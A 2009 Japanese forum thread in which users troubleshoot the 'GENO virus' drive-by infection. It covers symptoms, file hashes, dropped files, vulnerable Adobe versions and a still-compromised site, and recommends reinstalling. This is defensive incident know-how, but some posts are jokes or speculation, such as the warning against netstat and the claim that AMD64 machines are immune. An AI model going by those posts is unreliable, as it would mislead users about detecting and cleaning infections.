PCがおかしくなったんだけどどうやってなおせばいい?orz
323:名無しさん@お腹いっぱい。
09/04/09 07:26:52
>>319
5・6人集まったらmixiあたりでコミュニティでも作れば?
無料掲示板よかましだろ
324:名無しさん@お腹いっぱい。
09/04/09 07:29:05
>>322
そういう質問がでる時点でリカバリかと
必要なファイルのバックアップとってOSインスコし直しなさいな
325:名無しさん@お腹いっぱい。
09/04/09 07:38:52
>>323
多くの情報が欲しいのと、
荒らし、アンチ(社員)排除のために、自分で規制を発動できる
レンタル掲示板にしました。
326:名無しさん@お腹いっぱい。
09/04/09 07:40:39
>>322
___
|___ミ⌒ヽペタン
| ⌒)ノ ペタン
._ノ ) ((
| .・∀| ( 嘘ヽ
|__| | ̄ ̄ ̄|
/ > . | |
""""""""""""""""""""
327:名無しさん@お腹いっぱい。
09/04/09 07:42:30
>>322
感染してから対策したって意味ないぞw
328:名無しさん@お腹いっぱい。
09/04/09 07:45:40
husianasan hじゃなくてfだぞ
329:名無しさん@お腹いっぱい。
09/04/09 07:49:04
こういうときマカはさびしいよな
ウィルスに縁がなす
祭りのみんながうらやましい
330:名無しさん@お腹いっぱい。
09/04/09 07:52:18
>>329
GENOでWin機買えば今ならセットです。
331:名無しさん@お腹いっぱい。
09/04/09 07:55:29
>>326
unable to launch application. please restart your computer try again. error code: ー2147023174
って出てネットにもつながらんw
携帯から打ってる。
再インスコするわ
332:名無しさん@お腹いっぱい。
09/04/09 08:03:58
>>330
なんかすごくお得そうで欲しくなる不思議さw
333:名無しさん@お腹いっぱい。
09/04/09 08:07:50
>>332
あなたもこの機会に如何ですか?
今なら、GENOウイルスもフルセットで付いてきます。
334:名無しさん@お腹いっぱい。
09/04/09 08:20:04
スタッフA
「Webサイトの改ざんによるウイルス感染など普通にパソコンを使用しているだけでも、
ウイルスに感染してしまうという事例が増えています」
スタッフB
「ウイルスの感染を未然に防ぐためにも、最新のセキュリティソフトを使用し、
ウイルス定義データベースを常に最新に保つことが、安全なPC使用の第一歩です」
スタッフC
「ただいま、通販ショップGENOでは、総合セキュリティソフト各種を好評取り扱い中!
PCパーツご購入の際にご一緒にいかがですか?」
URLリンク(www.geno.co.jp)
335:名無しさん@お腹いっぱい。
09/04/09 08:26:56
最近PCが重い!
│
├ 1.ウィルスを駆除する
│
│ [まちがい]
│ 安上がりな方法ではありますが、対応していない場合もあるのが難点です。
│ それよりも別の手段を探してみませんか?
│ もっと確実な方法があるかも?
│ ↑
│ ココがポイント!
│
└ 2.GENOで新しいPCを買う
[せいかい]
web通販ショップ GENO
URLリンク(www.geno.co.jp)
336:名無しさん@お腹いっぱい。
09/04/09 08:34:13
概要>>1,51
la.exeがsqlsodbc.chmを書換>>60
sqlsodbc.chm?>>47-49
chm脆弱性>>52,65
sqlsodbc.chmの確認>>84,144,159,168,181
ComboFixで駆除例>>162
まとめ>>191,261
メモリ上のプロセスが書換られる>>71-72,79
感染経路?海外での感染例>>80,82
役立ちファイルまとめ>>307
結論>>314
337:名無しさん@お腹いっぱい。
09/04/09 08:35:10
右クリックが使い物になりません。。。
ファイルやフォルダにカーソル当てて右クリックすると
確実にエクスプローラーが落ちます。
ノートン先生の起動もブロックされてるようだし
これは 死 亡 確 認 でよろしいでしょうかw
338:名無しさん@お腹いっぱい。
09/04/09 08:35:32
踏んでしまったようなのですが、
気になって最初にカスペルオンラインで調べたところ、
Trojan-Downloader.JS.Agent.dwfが検知されました。
ただ、インターネットの一時ファイルを削除したら検知されなくなりました。
AdobeReader/Flash共に最新版ですし、
sqlsodbc.chmのハッシュ値も>>84の通り。
挙動も問題なく再起動も可能です。
これって安心して良いのでしょうか?
最初にカスペルオンラインで検知されたのが気になるんですが…
339:名無しさん@お腹いっぱい。
09/04/09 08:37:53
安心したければ、クリーンインストールしかない
340:名無しさん@お腹いっぱい。
09/04/09 08:37:54
まだやってたのか
341:名無しさん@お腹いっぱい。
09/04/09 08:40:16
>>338
>>279
現段階では安心とは言えない
342:名無しさん@お腹いっぱい。
09/04/09 09:27:37
ハッシュが正規のものと完全一致してれば間違いなく感染してないってことでFA?
343:名無しさん@お腹いっぱい。
09/04/09 09:28:28
あくまで一つの確認法だとおもわれ
344:名無しさん@お腹いっぱい。
09/04/09 09:40:00
質問。
閲覧して感染した場合、PC内のデータその物も感染してヤバいですかね?
ROMに焼いて他に移すとかもダメ?
最悪データを全部廃棄の形でクリーンインストするしかないのかな…?
345:名無しさん@お腹いっぱい。
09/04/09 09:42:18
>>343
特に問題も起きてないようなんで、とりあえず安心しておくことにしますわ
ただ、ここからは目を離せないなぁ
346:名無しさん@お腹いっぱい。
09/04/09 09:46:05
>>336
La.exeの書き換えは違うぞ。
La.exeはGENOウイルスと独立したもの。
La.exe、GENOウイルスは同じウイルスだがsqlsodbc.chmを書き換えるのはTEMPに作成される
explore.exe、または○○○.exeだと思われ(多分La.exeもexplorer.exeだと思う)
347:名無しさん@お腹いっぱい。
09/04/09 09:48:12
そもそもsqlsodbc.chmがwindows直下に見当たらない自分はアウト?
348:名無しさん@お腹いっぱい。
09/04/09 09:49:01
>>347
system32直下では?
349:名無しさん@お腹いっぱい。
09/04/09 09:49:16
C:\WINDOWS\system32の下だよ
350:名無しさん@お腹いっぱい。
09/04/09 09:50:10
サンクス>>348-349
ちょっと確認しみてる
351:名無しさん@お腹いっぱい。
09/04/09 09:51:52
あった
f639afde02547603a3d3930ee4bf8c12
一応安心した
352:名無しさん@お腹いっぱい。
09/04/09 09:53:38
ちなみにAVGの有料版は対応してる
353:名無しさん@お腹いっぱい。
09/04/09 10:02:57
そんな手間掛けなくてもnrtstatコマンドで感染してるか簡単に調べられるだろ
354:名無しさん@お腹いっぱい。
09/04/09 10:04:07
>>353
それやっちゃだめ 地雷が発動するから
355:名無しさん@お腹いっぱい。
09/04/09 10:05:20
>>353
netstatな
356:名無しさん@お腹いっぱい。
09/04/09 10:06:01
ニュー速で同じことを書いてる人が
357:名無しさん@お腹いっぱい。
09/04/09 10:07:39
某掲示板でAMD64のCPUなら大丈夫と書かれてたのですが
本当ですか?
358:名無しさん@お腹いっぱい。
09/04/09 10:08:56
>>356
まあ同時進行みたいなもんだからね。
俺はニュー速アク禁になってるからこっちだけ書いてる。
359:名無しさん@お腹いっぱい。
09/04/09 10:16:40
>>344だが誰か分かる人いない?
360:名無しさん@お腹いっぱい。
09/04/09 10:19:17
>>357
おれX2 3800+で感染したよorz
361:名無しさん@お腹いっぱい。
09/04/09 10:19:45
>>359
モノによるだろうから、例をあげれば答えやすいと思う。
アプリなら全て入れなおした方がいい。
おれもあまり詳しくない、スマソ
362:名無しさん@お腹いっぱい。
09/04/09 10:19:59
なんか思っていたよりもタチの悪いウイルスっぽいな。
キャッシュ削除で解決とかアリエナス。
間違った対処法を掲載して感染拡大させてるGENOは本当に酷いな
363:名無しさん@お腹いっぱい。
09/04/09 10:20:39
crestronjapan.comで感染を試みる(未だ有害)
Flashのバージョン10.0.22.87
Adobe Readerなしの環境→感染せず
Flashのバージョン10.0.22.87
Adobe Reader7環境→感染
Flashのバージョン10.0.22.87
Adobe Reader9→感染せず
つまり最新のAdobe Reader9なら感染しない
364:名無しさん@お腹いっぱい。
09/04/09 10:21:23
>>360
ギャフン!
365:名無しさん@お腹いっぱい。
09/04/09 10:21:31
>>359
ROMに焼いたデータは他のPCでチェックしてから移せば良いじゃん。
チェックは、このスレや他のGENO関連スレで挙がってる複数のソフトでやった方がいいと思う。
366:名無しさん@お腹いっぱい。
09/04/09 10:22:44
>>359
感染したPCにUSBメモリを挿した瞬間USBメモリ自体に感染してしまう
可能性も無きにしも非ずなので、試して見ないとわかりませんが、
自分は他のPCまで感染させるわけにいかないので、試せません
367:名無しさん@お腹いっぱい。
09/04/09 10:24:54
>>359
このウイルスはPE型ウイルス、ファイル感染型ウイルスではないので
バックアップは問題なし、またAutoRun系の機能もないです。
368:359
09/04/09 10:29:32
うを!?色々と書き込みが(大汗
レスしてくれた人達、本当にありがとうね。感謝。
デジカメ画像なんだけどとりあえずROMに焼いて
数週間経ってからスキャンしてみるよ。
多分その頃には各ベンダーも対応してるかもしれないから。
369:名無しさん@お腹いっぱい。
09/04/09 10:30:42
ν速やその他のアホがいい加減な事いったりしてるから
それにだまされる初心者が沢山いそうだな
370:名無しさん@お腹いっぱい。
09/04/09 10:31:37
>>357
98002 4400X2 2台環境でリーダーが7フラッシュ最新で感染未遂
pdf開かれたけど再起は問題無し
早々バックアップから復元してんでそれ以外は不明
371:名無しさん@お腹いっぱい。
09/04/09 10:31:40
>>346
sorry
372:名無しさん@お腹いっぱい。
09/04/09 10:32:37
>>368
引き続きここも継続監視を
373:名無しさん@お腹いっぱい。
09/04/09 10:32:58
>>368
それが最善策だと思います
374:名無しさん@お腹いっぱい。
09/04/09 10:33:02
>>367
なるほど。安心しますた。
ありがとう~(T_T)
375:名無しさん@お腹いっぱい。
09/04/09 10:38:51
とりあえず、
naxos、GENO公式は現在無害。
crestronjapan.com は未だjquery.jsが存在。
Adobe Readerのバージョンが古いと感染する恐れ>>363
376:名無しさん@お腹いっぱい。
09/04/09 10:41:49
>>375
> crestronjapan.com は未だjquery.jsが存在。
放置するんかねw
377:名無しさん@お腹いっぱい。
09/04/09 10:44:09
ほぼわかってきたね
・ウイルスの動作
・ウイルスの親玉(まだちょっと?)
・ウイルスの被害
・駆除方法
・今後の対策
・感染していないか確認する方法
ウイルスの親玉らしきものは検体採取済みでセキュ板内の可否スレの
住民が各ベンダーに検体提出してるみたいだし
378:名無しさん@お腹いっぱい。
09/04/09 10:49:37
とにかく ,lv ドメインを
ルーターやファイヤーウォールなどで
イン・アウトバウンドともに弾くこと、発症したら何があるかわからん
379:名無しさん@お腹いっぱい。
09/04/09 10:51:57
ウイルス自体は結構厄介だけど感染経路は別によくあるパターンだろ
特にFlashの脆弱性含め、Adobe Collab overflowなんて珍しくもなんともない気がするんだけど
これだけ感染広まってるって事はそれだけセキュリティに無頓着なやつが多いんだろうな
このウイルスで初めてpdfでもウイルスに感染すること知ったやついるだろ
今は逆に仮想PCでネットするしかないとか言い始めてるやつも要るけど・・・
380:名無しさん@お腹いっぱい。
09/04/09 10:56:20
でっていう
381:名無しさん@お腹いっぱい。
09/04/09 10:58:01
>>379
常に正常なサイトだと思っていたサイトが書き換えられてたりする危険は
前からあったしな
セキュリティ系ニュースのスレで情弱が、
あやしいサイトみなけりゃいいじゃん的なレスを散々目にしたがw
382:名無しさん@お腹いっぱい。
09/04/09 10:59:11
サイトが乗っ取られるのが一番悪い
383:名無しさん@お腹いっぱい。
09/04/09 11:01:29
たいした情報じゃないけど
sqlsodbc.chm
は改変されるんじゃなくて上書きされる
384:名無しさん@お腹いっぱい。
09/04/09 11:04:36
PDFとFlashのエクスプロイトコードはアンチウイルスソフトで引っかかるの?
385:名無しさん@お腹いっぱい。
09/04/09 11:05:56
Readerのバージョンにふれてる人、マイナーバージョンまで書いてほしいな。
バージョン7、8に関しては脆弱性に対応するアップデート(7.1.1、8.1.4)があるはず。
バージョン9も最新の9.1.0でないとダメなわけだから。
386:名無しさん@お腹いっぱい。
09/04/09 11:08:46
会社の感染したPCで sqlsodbc.chm のMD5調べたら
F639AFDE02547603A3D3930EE4BF8C12
ではなかった\(^o^)/
さて感染日時と感染経路を調べてみますわ
387:名無しさん@お腹いっぱい。
09/04/09 11:09:38
>>385
古いadobeが7.0.0.0
最新のが9.1.0.163
388:名無しさん@お腹いっぱい。
09/04/09 11:10:11
結局、一般で被害受けてるのはみんなXPなん?
俺はPDFとFlashを未対策のままVista+先生で
短縮ふんじゃったけど、特に何もおかしな挙動は
起きてないんだが・・・・。
389:名無しさん@お腹いっぱい。
09/04/09 11:10:11
GIZMODE Japan (ギズモードジャパン)GIZMODE japan
URLリンク(gizmode.blog26.fc2.com)
GENOウイルス情報
4日~7日までの間にPCショップGENOを観覧された方は
ウイルス感染の可能性があります。
サイトを開くだけでウイルスに感染する凶悪なタイプで
現在、大騒ぎになっております。
心当たりのある方は GENOウイルス被害者の会
で、情報交換しておりますので是非ご覧ください。
390:名無しさん@お腹いっぱい。
09/04/09 11:11:51
>>384
検体を入手できてないからわからんが
URLリンク(wepawet.iseclab.org)
でpdfの解析結果は出てる
391:名無しさん@お腹いっぱい。
09/04/09 11:14:06
んで何、今GENOは何食わぬ顔で営業したりしてやがってくれちゃったりするわけ?
392:名無しさん@お腹いっぱい。
09/04/09 11:15:13
>>390
サンクス
そのMD5でVirusTotalあさってみた
今はもう少し増えていることを願いたい
URLリンク(www.virustotal.com)
393:名無しさん@お腹いっぱい。
09/04/09 11:16:32
>>391
アンチウイルスソフトがバカ売れでウハウハらしい
394:名無しさん@お腹いっぱい。
09/04/09 11:16:40
AMDのCPU使ってても32bit版で動かしてたらx86だろw
AMD64なら大丈夫ってのは64Bit版って事だろ
395:名無しさん@お腹いっぱい。
09/04/09 11:19:19
>>388
感染の可能性がある人
・Windows XP以下(SPでも)
・ブラウザで IE/Fx/Sf/Op/GC を使用
・Adobe Reader(Ver 9.1未満)
・Adobe Flash(Ver n.m以下)
感染の可能性が低い(または無い)人
・Windows Vista
・JavaScriptをオフにしている
・Adobe Reader未インストール
・Adobe Reader互換のPDF Readerだけインストールしてある
・スタンドアロン
・sqlsodbc.chmのmd5値が [f639afde02547603a3d3930ee4bf8c12] >101
詳細情報
>336
上記はほぼコピペ
ReaderやFlashの脆弱バージョンについては
ここのスレの奴がかなり詳しいだろうから頼んます
396:名無しさん@お腹いっぱい。
09/04/09 11:19:22
あ、394はOSの話ね
64Bitだから感染しないって理由も無い気がするが。
397:名無しさん@お腹いっぱい。
09/04/09 11:24:36
親玉らしきファイルが
bxatg.mnn
カスペによると無害だそうだ。
ますます迷宮入り?
398:名無しさん@お腹いっぱい。
09/04/09 11:25:22
vistaだけど、そもそもsqlsodbc.chmが無い
399:名無しさん@お腹いっぱい。
09/04/09 11:28:21
PCの操作ログたどっていったら %WINDIR%\~.exe が生成されてて C:\_.bat にリネームされてたわw
直前にAdobe Readerが起動してるんでPDFの脆弱性付かれたっぽい。
400:名無しさん@お腹いっぱい。
09/04/09 11:29:58
>>395
Vistaは可能性低そうだけど、確定的じゃないから
油断せずにマシンの動作とスレの情報に気をつけておくよ。
情報ありが㌧
401:名無しさん@お腹いっぱい。
09/04/09 11:31:03
>>399
(-ノ-)/Ωチーン
ガンガレ
402:名無しさん@お腹いっぱい。
09/04/09 11:34:46
>>54をみるとFlashPlayerのほうは9.0.124未満狙いのようだが
それ以降が安全とも限らんのか
403:名無しさん@お腹いっぱい。
09/04/09 11:38:52
a-squaredてアンチマルウェアの方?無印?
404:名無しさん@お腹いっぱい。
09/04/09 11:41:43
URLリンク(itpro.nikkeibp.co.jp)
これのたぐいか
405:名無しさん@お腹いっぱい。
09/04/09 11:44:46
ノートンとバスターは2月に既に対応してたのか。やるじゃん
406:名無しさん@お腹いっぱい。
09/04/09 11:52:52
うちのVistaではsqlsodbc.chmはc:\windows\help\mui\0411にあった
407:名無しさん@お腹いっぱい。
09/04/09 11:56:03
>>405
もし、今回のウィルスがこの記事の内容のモノなら、
少なくともノートンとバスター入れてる人は被害に
あってないのかな?
408:名無しさん@お腹いっぱい。
09/04/09 11:57:11
今はどんな状況?
GENO以外のサイトにも拡散してるとか聞いたけど
409:名無しさん@お腹いっぱい。
09/04/09 11:58:01
わしの超漢字は絶好調
410:名無しさん@お腹いっぱい。
09/04/09 11:58:16
>>381
そもそも怪しいサイトって判定も曖昧だよな
俺も常連で通ってて何ともなかったサイトが改変されてた
のを直に体験したことあるんで、『怪しいところは開かない』
という標語の中身のなさを実感した
411:名無しさん@お腹いっぱい。
09/04/09 11:59:47
>>406
俺の環境では0409(米語)にもある。
ま、SQL Serverのバージョンによってハッシュも違うし、判断基準として
使うのは難しいよな。
412: ◆W07s5cWHb.
09/04/09 12:05:38
>>407
うちはノートン先生を毎日最新定義ファイルで動かしてるけど、
当初はLa.exeも未対応で検出しなかったし、
そもそも感染状態のGenoサイトを踏んでもまったく反応しなかったよ。
結局、Acrobatの脆弱性を突いたウィルスが沢山あって、
今回のウィルスもその一つで、
元々どこのセキュリティソフトメーカーにも対処されていなかっただけって話だよ。
413: ◆W07s5cWHb.
09/04/09 12:08:48
補足だけど、ノートン先生は既に現行最新の定義ファイルに更新すれば
ちゃんと検知してくれて
Javascriptを改ざんされていてラトビアに飛ばされるサイトを踏んでも
感染を未然に防ぐ。
てか、これはノートン先生以外でも恐らく同程度の対処は既に行われている筈。
414:名無しさん@お腹いっぱい。
09/04/09 12:10:41
既にウイルス入られてる人は先生もカスペも無反応って言ってたけど
あれ改善されたのかな?
415:名無しさん@お腹いっぱい。
09/04/09 12:12:50
山田チェッカーみたいに、感染してるか否か検査できるツールがあれば便利なのにね
416:名無しさん@お腹いっぱい。
09/04/09 12:15:16
>>363
Adobe Reader 7のバージョンは7.10?
417:名無しさん@お腹いっぱい。
09/04/09 12:17:24
sqlsodbc.HLPとsqlsodbc.GIDはあるけど
sqlsodbc.chmのファイル自体がない。
GIDの更新日時が今日になってるのが気になるんだけど
まさか拡張子偽装まではしないよね?
418:名無しさん@お腹いっぱい。
09/04/09 12:22:02
パソコン一般の方に一人親玉らしき献体持ってる奴いたな
そいつのはVTで反応してたんだけど
419: ◆W07s5cWHb.
09/04/09 12:23:02
>>414
少なくてもPC上に保存されていたla.exeに関しては
ノートン先生はZIP内のものも、UPX圧縮を解除したものに関しても即効で検知して
ぶっとばしてくれた。
恐らく他のセキュリティソフトも同様だと思う。
ただ、あんたはなにもわかってないみたいだから一言言うけど
ウィルスを食らった後の場合はそもそもセキュリティソフトで検知して駆除したから安心なんて話じゃなくて
原理原則的に可及的速やかにクリーンインストールかリカバリしないと駄目だよ。絶対に。
420:名無しさん@お腹いっぱい。
09/04/09 12:27:37
jsファイルは大体各ベンダー対応してるみたいだし
今後感染心配してる奴はAVアップデートすればいいと思う
で問題が感染後にドロップするファイルでこのドロップするファイルの採取が難しくて
未だにAVは役立たずという状態
421:名無しさん@お腹いっぱい。
09/04/09 12:28:49
>>412-413
973 名前: オステオスペルマム(dion軍)[] 投稿日:2009/04/09(木) 11:35:08.65 ID:jWIkg7dG
思い出スレになってんだろうと思って見に来たけどどうなってんだ。
収束してないどころかまだ拡散中?
982 名前: マンサク(大阪府)[] 投稿日:2009/04/09(木) 11:54:31.16 ID:g6SEJUpr
>>973
ウイルス仕込まれてるサイトが拡大してる。
セキュ板解析班がウイルスの親玉らしきファイルを特定したが
各ベンダーのアンチウイルスではスルー。
【結論】
何一つ解決してない。
422:名無しさん@お腹いっぱい。
09/04/09 12:29:02
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
スレリンク(news板)
423:名無しさん@お腹いっぱい。
09/04/09 12:29:35
la.exeは結局
HKLM\?SOFTWARE\?Microsoft\?Windows NT\?CurrentVersion\?Drivers32\aux
にドライバ登録して、それが再起動時になんかやってんだよね?
何やってんのかわかる人いない?
424: ◆W07s5cWHb.
09/04/09 12:32:42
>>421
てか、おいらはν速の人なんて
そっちのスレの中身は把握してます><
425:名無しさん@お腹いっぱい。
09/04/09 12:33:52
アクロバットは使って無くてFoxit Reader使ってるんですが
Versionは先月以降更新されてないようです。
このままでは危ないですか?
Foxit Reader 3.0 Build 1506 03/09/09
426:414
09/04/09 12:33:57
>>419
ごめんなんか怒らせた?
もちろん自分の場合は必ずリカバリするよ。
ただそういう話が出てたけどどうなったのかなと思って
427: ◆W07s5cWHb.
09/04/09 12:37:18
>>423
その辺はla.exeを逆アセンブルしてソースを解読して
La.exeの処理内容を把握しないと駄目なんだけど、
このスレには残念ながら現状ではその種のスキルがある奴がいないんだと思う。
プログラマ板から有能なプログラマを召還して解析しないとだめかもしらんね。
428: ◆W07s5cWHb.
09/04/09 12:38:43
>>426
全然怒ってないよん♪
ただ、あまり無闇に怯えたり、逆にやたらに過信しても駄目って事をいいたいだけ。
429:名無しさん@お腹いっぱい。
09/04/09 12:43:32
親玉を引っ張り出すところまでしかわかってなくて、
親玉が何をするかは一切不明なんだよね 今のところ。
ただ、ブラウザが落ちまくったりとかの症状しかあがってない。